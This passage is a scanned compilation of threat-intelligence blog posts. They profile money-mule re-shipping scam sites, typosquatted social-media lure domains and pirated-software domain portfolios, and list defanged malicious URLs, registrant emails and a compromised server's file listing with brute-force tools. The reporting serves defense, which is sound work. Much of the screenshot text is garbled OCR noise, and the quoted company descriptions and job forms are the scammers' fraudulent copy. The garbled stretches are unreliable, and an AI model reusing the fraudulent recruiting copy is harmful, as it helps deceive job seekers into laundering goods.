over the World. Our specialized transportation and logistics services over all countries lead 
the way as one of the most recognized brands in North America. 


Mission Global Transport & Logistics 


to provide the best international package and 


competitive prace on the market using the Latest te blog 


The time has come to profile a recently intercepted and currently active malicious and 
fraudulent re-shipping money mule recruitment fraudulent campaign successfully enticing 
users into interacting with the rogue and bogus content potentially risk-forwarding the risk of 
the fraudulent transaction to the unsuspecting user. 


6025 


Sample malicious URL: 


hxxp://yourshippingpanel.com 


Sample Mailing Address: 
One World Trade Center, New York, NY, 10007, USA 


+1 (606) 879-0046 


Sample Company Description: 


"Your Shipping Panel LLC" is successfully positioning the company “Founded in 1995, is 
a package delivery company with services to Eastern Europe as well as to all the countries of 
the former Soviet Union. Over the years, Your Shipping Panel LLC has grown into an industry 
leader by focusing on the goal of connecting customers in the United States with their families, 
friends and businesses in Eastern Europe. This also includes e-commerce between those 
countries. Today, Your Shipping Panel LLC has become a dominant force in package delivery 
with services to Ukraine, Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, 
Georgia, Azerbaijan and Armenia. Our specialized transportation and logistics services to 
those countries lead the way as the most recognized brand in North America." 


Sample Screenshots of The Related Web Sites Known to Have Been Involved in the 
Campaign: 
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(iti ii Hh) 


Track Your Order 
Service type 


Parcet {=} 
Parcel/Order # 


Calculate Time and Cost 
Select a Country 


Unaine {-] mass 9 why 


Select a Region 


West ane — [s] 


(_Cotadate_) 


Tate Wr aparcermators and may ret be he ent once Fie tree 
Wrote De bow peng ont serve 0 eres Cette 


Contact us for more information 


630.889.1100 


We ship your packages with ca 


on time, everytin 


Overseas Shipping Specialist 


Meest-Chicago has become @ dominant force in package delivery with services to Ukraine, 
Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan avd 
Armenta. Our specialized transportation and logistics services to those countries lead the way 
85 one of the most recognized brands in North America. 


Founded in 2001, Meest-Cticago, inc, a subsidiary of Meest Corporation inc, is a package 
Gelivery company with services to Eastern Europe as weil as to all the countries of the former 
Soviet Union. Over the years, Meest-Chicago, Inc has grown into an industry leader by focusing 
on the goal of connecting customers in North America with thet families, friends and 
businesses in Eastem Europe. This also includes e-commerce between Mose countries 

Today, MeestChicago has become a Gominant force in package Gelivery with services to 
Uiraine, Russia, Belarus, Moldova, Urbekxistan, Kazakhstan, Kyrgyzstan and Georgia Our 
specialized transportation and logistics services to those countries lead the way as the most 
fecogeized beassd in North America 


Our mission is to provide the best international package delivery service at the most 
Competitive price on the market using the latest technology. 


MEEST Chicago provides warehousing and consolidation services. Regaediess of size. our 
efficiemt warehousing solutions will give you the flexibility to meet changing demands of your 
business with reduced transportation and storage costs. We will pack, prepare and customize 
Your goods for different market needs. 


A wide network of representatives im the Untied States, Canada, Ukraine, and other countries 
allows us to be always accessible to our Customers. To locate 8 representative in your area, 
please, call our toll free number (630) 889-1 100. 


Working with MEEST CHICAGO can help you reduce the risks and costs due to our expertise in 
Customs Glearance 3s weil 8s regional transportation and logsstics specifics in the countries 
of the former Soviet Union 


All company offices are joined by one sophisticated computer network that makes f possible 
fot our customers to track the status of Your order at any time 
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Lead Asia Logistics Service . is commited to Deing a niche player in the vansponation industry and to be a partner win companies for af of thelr globe! transportation needs. We wil Excet win Distinction in profmanmity. concern 
fee people. service, measurements, and Ih pubic relations within 8 Company When achieved. he Crpanizenon will ean the respect from pecple and Companies by Gellvering 100% customer satsfacton with every tansacten 


Al Lead Asia Logistics Service is a professional Freight Forwarding Company mo has Deen giving aff type of logistics support successfully and to the Al satisfaction of Ms valued cients. We always look 0 provide excelent 
Quelity service with proposes functionality te match clleet's concept Our qualified and experienced tears of professionals is comrnitied to helping you to Guild your business in the future. 


Our Bir ans ocean teignt forwarding enables CUSIOMers to receive SNOT ENS expEdtiously and BTOrCAMy. GOOr-tO-GOOr BITPOM4D BIRO. OF $08 POrtto-se8 Port We USE The Most expEDTOVs Bnd COS! efectve sOILmONS 10 
Solver your shipments 


Our Vision 10 achieve performance excebent and create ste"dards and our Mission maintaining Nigh standard of quality support in order 10 fl cur Customer's needs. provide responsitie solutions 


About Us 


Founded in 1995, Solace Courier Logistics , is » package delivery company mith services to Laster Europe a5 well as to all the countries of the former Soviet Union. Over the WITHIN 
years, Solace Courter Logistits has grows into an industry leader By focusing on the goal of connecting Customers in the Usted States with their fernilies, friends and businesses in 
Eastern Europe. This also inxtudes e-commerce betmeen those countries 


Todsy, Solace Courter Logistics hws become a dorminant force in package Gelwery mith services to Ubraine, Rustia, Belarus, Moidows, Urbetistan, Kazaktatan, Kyrgyritan, Georgia, 
Azerbaijan, Indonestia, Pakistan ard Armenia. 
Our speciaized trassportation and logistics services to those countries lead the way as the most recogired brand in North Amerika. 


OUR MISSION is to provide the best international package and freight delivery service at the most competitive price on the market using the latest techsology. 


Solace Coerier Logistics is operating four main besteess divisions: 


Percels and Letters 

Ocean and Air Freight 

Flowers and Gifts 

FULFILLMENT of ontine orders from American stores and thelr delivery to our Customers outside the United states. 


Solace Cowier Logistics provides warehousing and consoldation services. Regardless of size, cur efficient warehousing solutions wil owe you the Mexibelity to meet Changing Gemands of your business with reduced 
transportation and storage costs. We will pack. prepare and customize Your goods for different market needs 


A wide network of representatives in the United States, Canada, Ubraine, and other Countries allows us to be always accessible to our 
customers. To locate @ representative in your area, please, call our phone number: 
Working with Solace Courier Logistics can help you reduce the ritis and couts due to our expertive in customs clearance as well a5 
fegienal trassportation and logistics specifics in the Countries of the former Soviet Union. ‘ 
— = = . 


Related domains known to have participated in the campaign: 
hxxp://meestshipping.com 
hxxp://www.bellwordcourier.site 
hxxp://unitedmorganexpresslogistics.com 
hxxp://fastexmega-delivery.com 
hxxp://supremelight-globaldelivery.com 
hxxp://mngcargocourier.com 
hxxp://fastex-uk.com 
hxxp://bequem-gh.com 
hxxp://diamonddeliverys.com 
hxxp://leadasialogistic.com 
hxxp://diplomatcourierservices.com 


hxxp://solacec.com 
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Stay tuned for an additional portfolio of re-shipping money mule recruitment scam domains to 
be published anytime soon. 


15.2.4 Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam 
Spotted in the Wild (2019-02-07 10:51) 


GLOBAL POSTAL EXPRESS 


MISSION 


At Giotal Postal express, We Provide best in servace global logistics through our people ty 
beaktmg lasting relatcaships with the comumutment to proceitize cor Customer needs to generate 
fascial results 


OBJECTIVES 


To offer personalized < e 
stions that immediately respond to the dynarr 
3 hat creates ess efficier 
4 marke hat give sstomer fe mite: fed 
and exceed their business goals and objectives 


VISION 


Be the leader in the development of integrated logistics strategies by offering the highest levels of quality, reliability and exceptional customer service while strategically growing naticaally and mtematiceall 


Unparalleled castomer service from a dedicated team of professicaals who will help coordmate your booking and ensure a seamless journey foe your animals 


PET SHIPPING 


[enereational bookings for pets are caly accepted from professional pet sbapgess who ace members of the Lenematiceaal Pet and Acsmal Transportation Assocastion (PATA). A list of [PATA members near you 
Can be found at www spata. ong Opens in new window 


Permanent Identification 


A mascrochap is Cerrensly the most accepted global standard for permaness anamal identification. Mout countries require maxro Rapping, and the mxrochep must be ISO compatible (typacally digits). Permanent 


tdentsfication offers the best msurance for reuniting a lost pet with as ores. Once you insert the microchip be sere to reg: x chip with the manufacturer. Alo be sure to Change the regsitratics 


tadcematson before your international travels or at least cace you reach your Gaal Sestination Note Gat tattoos are no longer accepted as means of sGentifcation 


Continuing the series of post detailing the activities of currently circulating malicious and 
fraudulent spam campaigns successfully targeting potential money mule recruiters I’ve 
recently came across to Global Postal Express which basically: 


"We Provide best in service global logistics through our people by building lasting rela- 
tionships with the commitment to prioritize our customer needs to generate financial results. 
Be the leader in the development of integrated logistics strategies by offering the highest 
levels of quality, reliability and exceptional customer service while strategically growing 
nationally and internationally." 


Sample malicious URL known to have participated in the campaign: 


6030 


hxxp://globalpostalexpress.net - Email: globalpostalexpressinc@gmail.com 
Sample Mailing Address: 
2549 Harris Ave, Sacramento,CA 95838, U.S.A 


+1 (719) 838 2416 


Sample Screenshots of the Service in Action: 


PRODUCT 1D PROT NAM Moe lVUD DATE ‘ATE COLATED coe Teac (tort PROOUCT TRACE Onrre 
exmoowiss CecReTEase? esn2y2018 enetress Ede Track Tbe Product Track Dale 
Cosnives 8 Cocerreesrs Suearote eneviee Ete Treck Te Pronto Trowel Deebete 
COMOTOLIB OecarTesast eLaz/2018 onovre1s Ee Track Ee Prodect Track Deere 
Cena SA OOCRETERAT etpe/7018 owot/zen8 Ede Track Lbs Product Track Delew 
CHO GSO Te MALL AND FIMAGE CON rote woes he Tet Fe Protest Teoh Darlene 
coursonns MALL AND FEMALE cL TO18 OwOL/2018 Bae Track Ee Protect Trach Detere 
CoML SE OevcRETeAgE? 26/2018 owot/2018 ae Track Lite Product Trace Dalene 
aheeresot? FRENCH BURLOOG seyenvaet7 sTevzen? Baa Track Fe Pade Teale Dalene 
aaseeuven21? Caceres aaaweme 2yiaszei? Eat Track Ede Protect Track Detere 
27RONNCO? ET OecAreTsa2 07/27/2017 27/07/2087 Ede Track Lae Protect Track Dalene 


global_ HOME 


vena Meera Tench Nonber savEsTPonis 
Dachage Mates Check Pole 

Date Tre 

marty Code ertryode Pedses Cot 


| se | Cuntomen Ovtat 
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11/05/2017 
02:30 PM 


11/06/2017 
03:30 PM 


11/06/2017 
05:49 PM 


11/06/2017 
06:30 PM 


11/07/2017 
08:31 AM 


PRODUCT CODE : TRACK | 


IN TRANSIT 11/07/2017 


MALE FRENCH BULLDOG RECEIVED ORIGIN FACILITY 
1801 Brook Rd. Richmond. VA 23232 


DELIVERY SCHEDULED TO 
2820 GOOSE CREEK RD. LOUISVILLE, KY 40242 


PAYMENTS FOR CRATE CONFIRMED 
PAYMENTS FOR CRATE CONFIRMED 


IN TRANSIT TO DESTINATION FACILITY 
2820 GOOSE CREEK RD. LOUISVILLE, KY 40242 


ARRIVED DESTINATION FACILITY IN 
407 Skyline Dr, Charleston, WV 25302, USA 


Sample Screenshots of the Related Malicious Domains Known to Have Participated in the 
Campaign: 
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WELLBURTON SHIPPING SERVICE 


Home 


meres by Oo ow Transiste 


Related malicious URLs known to have to participated in the campaign: 


hxxp://www.marannata.com 


hxxp://wellburton.com 
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hxxp://stecoexpress.com 


hxxp://mag-trading.com 


St ay tuned for an additional set of details regarding re-shipping money mule recruitment do- 
main portfolios anytime soon. 


15.2.5 Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruit- 
ment Scam Spotted in the Wild (2019-02-07 12:14) 


OUR RATES 
SENDING 5LBS PACKAGE TO GERMANY WILL COST $25 PER PACKAGE +Postace 
[seme ) ) $16.2> 
wre. ms [Bnd MOST POPULAR] $39.36 > 
C= Eien $50.2> 
FedEx $40.2> 
FedEx $42> 
eae $16.2> 
P= Fotis sina 
OO) o $75.6> 
8D om $60.04) 
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I’ve recently intercepted a currently circulating malicious and fraudulent spam campaign 
successfully impersonating "Able Express Courier Service" to utilize a re-shipping mule 
recruitment scam potentially targeting tens of thousands of unsuspecting users globally. 


Sample malicious URL known to have participated in the campaign: 


hxxp://ablecs.biz - 104.31.82.184 - Email: phyllisjhurst@grr.la 


Sample Mailing Address: 
PO Box 34459 
Bartlett, TN 38184-0459 
United States 


+1 (888) 597-5808 


The service is positioning itself as "Able Express Courier Service has been providing forwarding 
services for more than three years now. Our staff consists of experienced professionals who 
regularly get certified and verified for competency. Over the years, Test Compant inc has 
delivered packages to a variety of places and gained many major business partners all around 
the world." 


Sample Screenshots of the Malicious and Fraudulent Service: 
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Name of school: 


Phone: 


Did you graduate? 


College (OPTIONAL) 


Name of college: 


Phone: 


Did you graduate? Degree type: 


Address: 


Years completed: 


Degree type: 


Address: 


Date Attended: 


Major: 
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Present or most recent employer (OPTIONAL) 


Company name: Employers phone: 

Address: City / State: Zip: 

Job title: Employed from: Employed to: 
Starting salary: Ending salary: Supervisor's name: 
Job duties: 

Reson for leaving: May we contact this employer: 


Reson for leaving: 


Additional employment history (OPTIONAL) 


Company name: 

Address: City / State: 
Job title: Employed from: 
Starting salary: Ending salary: 
Job duties: 


May we contact this employer: 
Employers phone: 
Zip: 
Employed to: 


Supervisor's name: 
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Job duties: 


Reson for leaving: May we contact this employer: 


| certify that the information | have provided in this employment application is accurate and has been completed to the best of my knowledge and 
ability. | understand that any falsification, misrepresentation or omission in my interviews or any other employment record, will be sufficient reason to 
deny employment and/or may be reason for future dismissal. 


Signature: 


& CUSTOMER REVIEWS CONTACT US 
AM 


Very fast servece. Appreciation and Many 
BBB 


ABOUT US 


nt on my 


Wonderful Servic $ ne 0, anc you Can Cou! 


further usage 


atest updates 
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St ay tuned for an additional set of det ails regarding re-shipping money mule recruitment 
scams to be publishe anytime soon. 


15.2.6 Historical OSINT - Profiling a Typosquatted Facebook and Twitter Imperson- 
ating Fraudulent and Malicious Domains Portfolio (2019-02-07 15:47) 


Tweets Tweets & replies 


.@) jt | Qg 


Laura Richards @LauraRichargs : 1 Nov 2009 Vv 
Come Browse My Naughty Pix http://snipurl.com/szy59 


QO a Q 

. Laura Richards @LauraRichargs - 1 Nov 2009 Vv 
Go check out my hot pix http://is.gd/4KsgX 

Oo a) Q 


Laura Richards @LauraRichargs - 1 Nov 2009 Vv 
Wow, this site is awesome. You have to try it out :-) http://is.gd/4KbHy 


o td Q 


Laura Richards @LauraRichargs - 1 Nov 2009 Vv 
Got my Morrissey tickets for Seattle... please get well Moz, I havent seen you for 2 
years.@Onedeep23 SHIDD I PACKED DA HOUSE UP U??? 


0 tT iv, 


. Laura Richards @LauraRichargs - 1 Nov 2009 Vv 
#internetnecesario Please view my hot videos. http://is.gd/4KbHy 
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With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of 
malicious released including a variety of typosquatted domains it shouldn’t be surprising that 
hundreds of thousands of users continue falling victim to fraudulent and malicious malware 
and exploits serving schemes. 


In this post I’ll profile a currently active fraudulent and malicious typosquatted domain 
portfolio successfully impersonating Facebook and Twitter for the purpose of enticing users 
into interacting with the rogue and malicious domains. 


Related domains known to have participated in the campaign: 
hxxp://sm-url.info 
hxxp://sm-urls.info 
hxxp://smurls.info 
hxxp://smirl.info 
hxxp://smalladdr.info 
hxxp://sm-irl.info 
hxxp://tnylnk.info 
hxxp://tnysite.info 
hxxp://smalink.info 
hxxp://profilelink.info 
hxxp://muypix.info 
hxxp://profilehoster.info 
hxxp://quiklynk.info 
hxxp://tnyur.info 
hxxp://skurls.info 
hxxp://smrls.info 


hxxp://smulrs.info 
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hxxp://snurls.info 
hxxp://link-out.info 
hxxp://make-small.info 
hxxp://make-tiny.info 
hxxp://makesmall.info 
hxxp://maketiny.info 
hxxp://maketny.info 
hxxp://mehprofile.info 
hxxp://muhprofile.info 
hxxp://quickprofile.info 
hxxp://quiklink.info 
hxxp://quikprofile.info 
hxxp://small-url.info 
hxxp://smalllink.info 
hxxp://tinyout.info 
hxxp://go-out.info 
hxxp://out-link.info 
hxxp://tny-url.info 
hxxp://posta-link.info 
hxxp://tiny-out. info 
hxxp://private-pics.info 
hxxp://private-pix.info 
hxxp://coool-pics.info 
hxxp://sxypics.info 


hxxp://sxypix.info 
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hxxp://my-link-out.info 
hxxp://my-lynk.info 
hxxp://go-to-my-pix.info 
hxxp://my-profile-Ink.info 
hxxp://smaller-link.info 
hxxp://smaller-urls.info 
hxxp://pics-url.info 
hxxp://pix-url.info 
hxxp://quick-pix.info 
hxxp://quick-profile.info 
hxxp://pics-links.info 
hxxp://pix-links.info 
hxxp://check-my-pics.info 
hxxp://check-my-profile.info 
hxxp://check-my-link.info 
hxxp://click-links.info 
hxxp://my-photo-profile.info 
hxxp://photo-profile.info 
hxxp://my-video-profile.info 
hxxp://video-profile.info 
hxxp://hotvideoprofile.info 
hxxp://my-videos-profile.info 
hxxp://myphotoprofile.info 
hxxp://mypictureprofile.info 


hxxp://mysexyphotos.info 
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hxxp://mysexypix.info 
hxxp://mysexyvideos.info 
hxxp://mysexyvids.info 
hxxp://mysxyphotos.info 
hxxp://mysxypics.info 
hxxp://mysxypictures.info 
hxxp://mysxyprofile.info 
hxxp://mysxyvideos.info 
hxxp://mysxyvids.info 
hxxp://myvideoprofile.info 
hxxp://myvideosprofile.info 
hxxp://profile-link.info 
hxxp://sxyprofiles.info 
hxxp://myhotphotos.info 
hxxp://myhotpictures.info 
hxxp://myhotprofile.info 
hxxp://myhotvideos.info 
hxxp://myhotvids.info 
hxxp://my-photos-r-cool.info 
hxxp://my-profile-page.info 
hxxp://my-cool-profile.info 
hxxp://my-photo-spot.info 
hxxp://my-profile-spot.info 
hxxp://my-video-spot.info 


hxxp://myphotopages.info 
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hxxp://myprofilepages.info 
hxxp://photo-pages.info 
hxxp://profile-pages.info 
hxxp://videoz-profile.info 
hxxp://myphoto-gallery.info 
hxxp://myphoto-spot.info 
hxxp://myvideo-spot.info 
hxxp://myvideospot.info 
hxxp://show-my-pictures.info 
hxxp://show-my-videos.info 
hxxp://show-my-vids.info 
hxxp://show- off-pics.info 
hxxp://show-off-vids.info 
hxxp://show-your-photos.info 
hxxp://check-my-page.info 
hxxp://show-my-picx.info 
hxxp://show-my-vidds.info 
hxxp://my-profile-site.info 
hxxp://profile-sites.info 
hxxp://profile-space.info 
hxxp://view-my-profile.info 
hxxp://view-profile.info 
hxxp://profile-link2.info 
hxxp://profile-link3.info 


hxxp://profile-link4.info 
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hxxp://profile-link5.info 
hxxp://profile-link6.info 
hxxp://profile-link7.info 
hxxp://profile-link8.info 
hxxp://twitpic-1.info 
hxxp://twitpic-2.info 
hxxp://twitpic-3.info 


hxxp://twitpic-4.info 


hxxp://my-pictures-domain.info 


hxxp://photo-profile-sites.info 
hxxp://picture-profile-site.info 
hxxp://picture-profile-sites.info 
hxxp://picture-profiles.info 
hxxp://video-profile-site.info 
hxxp://video-profile-sites.info 
hxxp://myprofile-site.info 
hxxp://photo-gallery-sites.info 
hxxp://photogallery-site.info 
hxxp://photogallery-sites.info 
hxxp://theprofileiste.info 
hxxp://photo-galleries-1.info 
hxxp://photo-galleries-10.info 
hxxp://photo-galleries-2.info 
hxxp://photo-galleries-3.info 


hxxp://photo-galleries-4.info 
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hxxp://photo-galleries-5.info 
hxxp://photo-galleries-6.info 
hxxp://photo-galleries-7.info 
hxxp://photo-galleries-8.info 
hxxp://photo-galleries-9.info 
hxxp://unrated-profiles-1.info 
hxxp://unrated-profiles-10.info 
hxxp://unrated-profiles-2.info 
hxxp://unrated-profiles-3.info 
hxxp://unrated-profiles-4.info 
hxxp://unrated-profiles-5.info 
hxxp://unrated-profiles-6.info 
hxxp://unrated-profiles-7.info 
hxxp://unrated-profiles-8.info 
hxxp://unrated-profiles-9.info 
hxxp://unrated-profile-1.info 
hxxp://unrated-profile-10.info 
hxxp://unrated-profile-2.info 
hxxp://unrated-profile-3.info 
hxxp://unrated-profile-4.info 
hxxp://unrated-profile-5.info 
hxxp://unrated-profile-6.info 
hxxp://unrated-profile-7.info 
hxxp://unrated-profile-8.info 


hxxp://unrated-profile-9.info 
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hxxp://r-rated-photos-1.info 
hxxp://r-rated-photos-10.info 
hxxp://r-rated-photos-2.info 
hxxp://r-rated-photos-3.info 
hxxp://r-rated-photos-4.info 
hxxp://r-rated-photos-5.info 
hxxp://r-rated-photos-7.info 
hxxp://r-rated-photos-8.info 
hxxp://r-rated-photos-9.info 
hxxp://r-rated-profile-1.info 
hxxp://r-rated-profile-10.info 
hxxp://r-rated-profile-2.info 
hxxp://r-rated-profile-3.info 
hxxp://r-rated-profile-4.info 
hxxp://r-rated-profile-5.info 
hxxp://r-rated-profile-6.info 
hxxp://r-rated-profile-7.info 
hxxp://r-rated-profile-8.info 
hxxp://r-rated-profile-9.info 
hxxp://unrated-gallery-1.info 
hxxp://unrated-gallery-10.info 
hxxp://unrated-gallery-2.info 
hxxp://unrated-gallery-3.info 
hxxp://unrated-gallery-4.info 


hxxp://unrated-gallery-5.info 
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hxxp://unrated-gallery-6.info 
hxxp://unrated-gallery-7.info 
hxxp://unrated-gallery-8.info 
hxxp://unrated-gallery-9.info 
hxxp://profile-unrated-1.info 
hxxp://profile-unrated-10.info 
hxxp://profile-unrated-2.info 
hxxp://profile-unrated-3.info 
hxxp://profile-unrated-4.info 
hxxp://profile-unrated-5.info 
hxxp://profile-unrated-6.info 
hxxp://profile-unrated-7.info 
hxxp://profile-unrated-8.info 
hxxp://profile-unrated-9.info 
hxxp://iprosa.com 
hxxp://sm-urls.com 
hxxp://snkirl.com 
hxxp://tnulk.com 
hxxp://smulx.com 
hxxp://tnysnorl.com 
hxxp://supalnk.com 
hxxp://tnyweb.com 
hxxp://smInk.com 
hxxp://profilehoster.com 


hxxp://make-small.com 
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hxxp://my-link-out.com 
hxxp://url-out.com 
hxxp://profile-out.com 
hxxp://tiny-out.com 
hxxp://posta-link.com 
hxxp://coool-pics.com 
hxxp://twitpics-1.com 
hxxp://twitpics-4.com 
hxxp://twitpics-2.com 
hxxp://twitpics-3.com 
hxxp://profile-video-gallery.com 
hxxp://fo-photo-gallery.com 


hxxp://fb-gallery.com 


hxxp://profile-photo-gallery.com 


hxxp://profilegallerysite.com 
hxxp://profilepicturesite.com 
hxxp://my-profile-gallery.com 
hxxp://profile-gallery.com 
hxxp://profile-galleries.com 
hxxp://her-profile-pictures.com 
hxxp://her-picture-sites.com 
hxxp://her-photo-site.com 
hxxp://gallery-link.com 
hxxp://her-photo-sites.com 


hxxp://her-profile-photos.com 
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hxxp://her-profile-out.com 
hxxp://her-profiles.com 
hxxp://her-picture-site.com 
hxxp://photosites-now.com 
hxxp://photos-for-fb.com 
hxxp://photosforfb.com 


hxxp://photo-galleries-onilne.com 


Stay tuned for an updated set of typosquatted malicious and fraudulent domains imper- 
sonating popular brands to be published anytime soon. 


15.2.7 Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM- 
Pirated Software (2019-02-07 17:27) 

In a cybercrime-ecosystem dominated by fraudulent and malicious releases cybercriminals 

continue relying on fraudulent and potentially-malicious affiliate-based type of revenue- 


sharing schemes for the purpose of serving fraudulent and malicious software to thousands of 
unsuspecting users including OEM-powered pirated software to millions of users globally. 


In this post I'll profile a currently active fraudulent and malicious domain portfolio of 
OEM-powered pirated-software serving fraudulent and malicious domains. 


Related domains known to have participated in the campaign: 
hxxp://store-software-7.com - Email: altsrv@gmail.com 
hxxp://oem-store-software-7.com - Email: altsrv@gmail.com 
hxxp://store-digital-software-7.com - Email: altsrv@gmail.com 
hxxp://oem-digital-software-7.com - Email: altsrv@gmail.com 
hxxp://shop-digital-software-7.com - Email: altsrpv@gmail.com 
hxxp://buy-shop-software-7.com - Email: altsrv@gmail.com 


hxxp://buyshop-software-7.com - Email: altsrv@gmail.com 
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hxxp://store-buy-software-7.com - Email: altsrv@gmail.com 
hxxp://digital-shopsoftware-7.com - Email: altsrv@gmail.com 
hxxp://buy-shopsoftware-7.com - Email: altsrv@gmail.com 
hxxp://digitalouysoftware-7.com - Email: altsrv@gmail.com 
hxxp://software-digital-store-7.com - Email: altsrv@gmail.com 
hxxp://buy-shop-digital-7.com - Email: altsrv@gmail.com 
hxxp://buyshop-digital-7.com - Email: altsrv@gmail.com 
hxxp://buy-soft-digital-7.com - Email: altsrv@gmail.com 
hxxp://soft-buy-digital-7.com - Email: altsrv@gmail.com 
hxxp://softbuy-digital-7.com - Email: altsrv@gmail.com 
hxxp://softwaredigital-7.com - Email: altsrv@gmail.com 
hxxp://buy-softdigital-7.com - Email: altsrv@gmail.com 
hxxp://softbuydigital-7.com - Email: altsrv@gmail.com 
hxxp://storesoftware-oem-7.com - Email: altsrv@gmail.com 
hxxp://digitalsoftware-oem-7.com - Email: altsrv@gmail.com 
hxxp://store-oem-7.com - Email: altsrv@gmail.com 
hxxp://soft-buy-oem-7.com - Email: altsrv@gmail.com 
hxxp://digital-storeoem-7.com - Email: altsrpv@gmail.com 
hxxp://digitaloem-7.com - Email: altsrv@gmail.com 
hxxp://digital-buyoem-7.com - Email: altsrv@gmail.com 
hxxp://digitalbuy-shop-7.com - Email: altsrv@gmail.com 
hxxp://buyoem-soft-7.com - Email: altsrv@gmail.com 
hxxp://digital-buy-soft-7.com - Email: altsrv@gmail.com 
hxxp://digitalbuy-soft-7.com - Email: altsrv@gmail.com 


hxxp://digital-buysoft-7.com - Email: altsrv@gmail.com 
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hxxp://digitalbuysoft-7.com - Email: altsrv@gmail.com 
hxxp://shopsoftware-buy-7.com - Email: altsrv@gmail.com 
hxxp://software-store-buy-7.com - Email: altsrpv@gmail.com 
hxxp://digitalshop-buy-7.com - Email: altsrpv@gmail.com 
hxxp://digital-soft-buy-7.com - Email: altsrv@gmail.com 
hxxp://digitalsoft-buy-7.com - Email: altsrv@gmail.com 
hxxp://software-digitalbuy-7.com - Email: altsrpv@gmail.com 
hxxp://oem-digitalbuy-7.com - Email: altsrpv@gmail.com 
hxxp://softdigitalbuy-7.com - Email: altsrv@gmail.com 
hxxp://digital-softbuy-7.com - Email: altsrv@gmail.com 
hxxp://digitalsoftbuy-7.com - Email: altsrv@gmail.com 
hxxp://digitaltributary.com - Email: altsrv@gmail.com 
hxxp://oemstore-software-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://digital-buy-software-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://shop-buy-software-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://buydigitalsoftware-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://digital-buysoftware-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://buysoftware-store-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://software-buy-store-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://buysoftwarestore-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://oem-digitalstore-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://software-oemstore-7.ru - Email: mikepanin1990@gmail.com 
hxxp://store-digital-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://storeoem-digital-7.ru - Email: mikepaninl1990@gmail.com 


hxxp://oembuy-digital-7.ru - Email: mikepaninl1990@gmail.com 
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hxxp://shop-softwaredigital-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://softwarebuydigital-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://store-software-oem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://buy-software-oem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://software-digital-oem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://storedigital-oem-7.ru - Email: mikepaninl990@gmail.com 
hxxp://softwareoem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://digitalsoftwareoem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://softwarestoreoem-7.ru - Email: mikepaninl1990@gmail.com 
hxxp://buysoftwareshop-7.ru - Email: mikepaninl1990@gmail.com 


hxxp://software-digitalshop-7.ru - Email: mikepaninl1990@gmail.com 


With software piracy continuing to increase and proliferate it shouldn’t be surprising that 
rogue and fraudulent affiliate-based type of networks will continue to make impact globally 
potentially exposing millions of user to a variety of risks including malicious software. 


Stay tuned for an updated set of fraudulent and malicious piracy-themed portfolio of 
domains to be published anytime soon. 


15.2.8 Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compro- 
mise Malware Serving Campaign - 2010 (2019-02-07 17:30) 
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(DIR] Parent Directory 26-Oct-2007 18:27 - 


[ ] BE.2ip 27-Oct-2007 20:16 2.3é 
{ ] Data.zip 30-Oct-2007 17:54 137k 
{ }) Muserveri.02D.Dev by..> 26-Oct-2007 23:36 4.1éM 
{TXT] ae.cxec 22-Dec-2007 18:14 24k 
(TXT) bne.ctxtc 03-Nov-2007 10:37 117k 
(TXT) bne2.cxe 03-Nov-2007 10:37 117k 
{TXT} boots.txt 30-Oct-2007 13:35 24k 
(TXT) bots.txt 77-Oct-2007 12:23 24k 
{ ] box.php 09-Jun-2008 21:18 ik 
(TXT) br.txe 20-Jan-2008 19:26 33k 
[ ]) bruteBR.zip 26-Jan-2008 18:07 SSik 
{ }) bruteINT.tar.gz 17-Dec-2007 15:34 120k 
{ ) bruteS4PO.zip 23-Feb-2008 14:52 $5ik 
(TXT) cmd.cxe 18-Dec-2007 16:42 ok 
(TXT] cmd2.cxe 03-Oct-2007 15:47 13k 
{TXT] das.txe 30-Dec-2007 13:16 2ik 
{TXT} dnsMIL.cxt 08-Jan-2008 19:35 S6ék 
(TXT) ea.cxec 23-Dec-2007 21:59 24k 
(TXT) epro.cxt 29-Dec-2007 10:44 16k 
(TXT) fafa.cxe 15-Feb-2008 11:49 i3k 
{TXT] fdp.txt OS-Jun-2008 10:56 33k 
{TXT} fuck.txt 09-Jan-2008 17:09 65k 
{ ) go.zip 27-Jan-2008 16:16 8k 
[ ] halflife-admin-2.50...> 12-Nov-2007 12:16 1.6% 
{(TXT] help.txt 31-Dec-2007 13:50 24k 
{ ]) hitv.zip 04-Apr-2008 16:23 ik 
{ } hitv2.zip 04-Apr-2008 22:18 ik 
(TXT) index. ctxt 16-Jan-2008 11:01 25k 
{ ] izc.2ip 27-Jan-2008 19:41 8k 
{ ] local.zip 22-Jan-2008 16:16 4k 
{ ] maps.zip 03-May-2008 17:02 743k 
{ }) modo.zip 27-Jan-2008 17:22 ik 
{ ]) motd.zip 27-Jan-2008 16:59 ik 
{ ] motdd.zip 27-Jan-2008 17:31 ik 
(TXT) net.txt 16-May-2008 10:09 23k 
{ ]) new.zip 28-Jan-2008 06:45 ik 
{TXT} noak.cxc 15-Apr-2008 15:37 23k 
{ ] novo.zip 05-Jun-2008 11:07 6k 
{ ] ops.zip 28-Jan-2008 10:14 iSk 
{TXT] p.txt 25-Nov-2007 07:55 24k 
{TXT} pi7.ctxt 14-Jan-2008 03:49 25k 
(TXT] pbot.txt 08-Apr-2008 20:07 23k 
(TXT) ppp.txt 08-Apr-2008 20:07 23k 
